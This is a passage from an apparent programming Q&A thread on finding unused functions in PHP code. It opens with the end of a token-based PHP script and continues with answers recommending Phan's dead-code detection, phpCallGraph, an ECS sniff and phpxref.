if ( safe_arr($current_token, 0) == T_FUNCTION )
{
// Find the 'function' token, then try to grab the
// token that is the name of the function being defined.
//
// For every defined function, retain the file and line
// location where that function is defined. Since different
// modules can define a functions with the same name,
// we retain multiple definition locations for each function name.
$function_name = safe_arr($next_token, 1, false);
$line = safe_arr($next_token, 2, false);
if ( $function_name && $line )
{
$function_name = trim($function_name);
if ( $function_name != "" )
{
$defined_functions[$function_name][] = array('file' => $file, 'line' => $line);
}
}
}
}
}
}
}
// We now have a collection of defined functions and
// their definition locations. Go through the tokens again,
// and find 'uses' of the function names.
foreach ( $tokenized as $file => $tokens )
{
foreach ( $tokens as $token )
{
if ( is_array($token) && safe_arr($token, 0) == T_STRING )
{
$function_name = safe_arr($token, 1, false);
$function_line = safe_arr($token, 2, false);;
if ( $function_name && $function_line )
{
$locations_of_defined_function = safe_arr($defined_functions, $function_name, false);
if ( $locations_of_defined_function )
{
$found_function_definition = false;
foreach ( $locations_of_defined_function as $location_of_defined_function )
{
$function_defined_in_file = $location_of_defined_function['file'];
$function_defined_on_line = $location_of_defined_function['line'];
if ( $function_defined_in_file == $file &&
$function_defined_on_line == $function_line )
{
$found_function_definition = true;
break;
}
}
if ( !$found_function_definition )
{
// We found usage of the function name in a context
// that is not the definition of that function.
// Consider the function as 'used'.
unset($defined_functions[$function_name]);
}
}
}
}
}
}
print_report($defined_functions);
exit;
// ============================================================================
function php_files($path)
{
// Get a listing of all the .php files contained within the $path
// directory and its subdirectories.
$matches = array();
$folders = array(rtrim($path, DIRECTORY_SEPARATOR));
while( $folder = array_shift($folders) )
{
$matches = array_merge($matches, glob($folder.DIRECTORY_SEPARATOR."*.php", 0));
$moreFolders = glob($folder.DIRECTORY_SEPARATOR.'*', GLOB_ONLYDIR);
$folders = array_merge($folders, $moreFolders);
}
return $matches;
}
// ============================================================================
function safe_arr($arr, $i, $default = "")
{
return isset($arr[$i]) ? $arr[$i] : $default;
}
// ============================================================================
function tokenize($file)
{
$file_contents = file_get_contents($file);
if ( !$file_contents )
{
return false;
}
$tokens = token_get_all($file_contents);
return ($tokens && count($tokens) > 0) ? $tokens : false;
}
// ============================================================================
function usage()
{
global $argv;
$file = (isset($argv[0])) ? basename($argv[0]) : "find_unused_functions.php";
die("USAGE: $file <root_directory>\n\n");
}
// ============================================================================
function print_report($unused_functions)
{
if ( count($unused_functions) == 0 )
{
echo "No unused functions found.\n";
}
$count = 0;
foreach ( $unused_functions as $function => $locations )
{
foreach ( $locations as $location )
{
echo "'$function' in {$location['file']} on line {$location['line']}\n";
$count++;
}
}
echo "=======================================\n";
echo "Found $count unused function" . (($count == 1) ? '' : 's') . ".\n\n";
}
// ============================================================================
/* EOF */
2020 Update
I have used the other methods outlined above, even the 2019 update answer here is outdated.
Tomáš Votruba's answer led me to find Phan as the ECS route has now been deprecated. Symplify have removed the dead public method checker.
Phan is a static analyzer for PHP
We can utilise Phan to search for dead code. Here are the steps to take using composer to install. These steps are also found on the git repo for phan. These instructions assume you're at the root of your project.
Step 1 - Install Phan w/ composer
composer require phan/phan
Step 2 - Install php-ast
PHP-AST is a requirement for Phan
As I'm using WSL, I've been able to use PECL to install, however, other install methods for php-ast can be found in a git repo
pecl install ast
Step 3 - Locate and edit php.ini to use php-ast
Locate current php.ini
php -i | grep 'php.ini'
Now take that file location and nano (or whichever of your choice to edit this doc). Locate the area of all extensions and ADD the following line:
extension=ast.so
Step 4 - create a config file for Phan
Steps on config file can be found in Phan's documentation on how to create a config file
You'll want to use their sample one as it's a good starting point. Edit the following arrays to add your own paths on both
directory_list & exclude_analysis_directory_list.
Please note that exclude_analysis_directory_list will still be parsed but not validated eg. adding Wordpress directory here would mean, false positives for called wordpress functions in your theme would not appear as it found the function in wordpress but at the same time it'll not validate functions in wordpress' folder.
Mine looked like this
......
'directory_list' => [
'public_html'
],
......
'exclude_analysis_directory_list' => [
'vendor/',
'public_html/app/plugins',
'public_html/app/mu-plugins',
'public_html/admin'
],
......
Step 5 - Run Phan with dead code detection
Now that we've installed phan and ast, configured the folders we wish to parse, it's time to run Phan. We'll be passing an argument to phan --dead-code-detection which is self explanatory.
./vendor/bin/phan --dead-code-detection
This output will need verifying with a fine tooth comb but it's certainly the best place to start
The output will look like this in console
the/path/to/php/file.php:324 PhanUnreferencedPublicMethod Possibly zero references to public method\the\path\to\function::the_funciton()
the/path/to/php/file.php:324 PhanUnreferencedPublicMethod Possibly zero references to public method\the\path\to\function::the_funciton()
the/path/to/php/file.php:324 PhanUnreferencedPublicMethod Possibly zero references to public method\the\path\to\function::the_funciton()
the/path/to/php/file.php:324 PhanUnreferencedPublicMethod Possibly zero references to public method\the\path\to\function::the_funciton()
Please feel free to add to this answer or correct my mistakes :)
If I remember correctly you can use phpCallGraph to do that. It'll generate a nice graph (image) for you with all the methods involved. If a method is not connected to any other, that's a good sign that the method is orphaned.
Here's an example: classGallerySystem.png
The method getKeywordSetOfCategories() is orphaned.
Just by the way, you don't have to take an image -- phpCallGraph can also generate a text file, or a PHP array, etc..
Because PHP functions/methods can be dynamically invoked, there is no programmatic way to know with certainty if a function will never be called.
The only certain way is through manual analysis.
2019+ Update
I got inspied by Andrey's answer and turned this into a coding standard sniff.
The detection is very simple yet powerful:
finds all methods public function someMethod()
then find all method calls ${anything}->someMethod()
and simply reports those public functions that were never called
It helped me to remove over 20+ methods I would have to maintain and test.
3 Steps to Find them
Install ECS:
composer require symplify/easy-coding-standard --dev
Set up ecs.yaml config:
# ecs.yaml
services:
Symplify\CodingStandard\Sniffs\DeadCode\UnusedPublicMethodSniff: ~
Run the command:
vendor/bin/ecs check src
See reported methods and remove those you don't fine useful 👍
You can read more about it here: Remove Dead Public Methods from Your Code
phpxref will identify where functions are called from which would facilitate the analysis - but there's still a certain amount of manual effort involved.
afaik there is no way. To know which functions "are belonging to whom" you would need to execute the system (runtime late binding function lookup).
But Refactoring tools are based on static code analysis. I really like dynamic typed languages, but in my view they are difficult to scale. The lack of safe refactorings in large codebases and dynamic typed languages is a major drawback for maintainability and handling software evolution.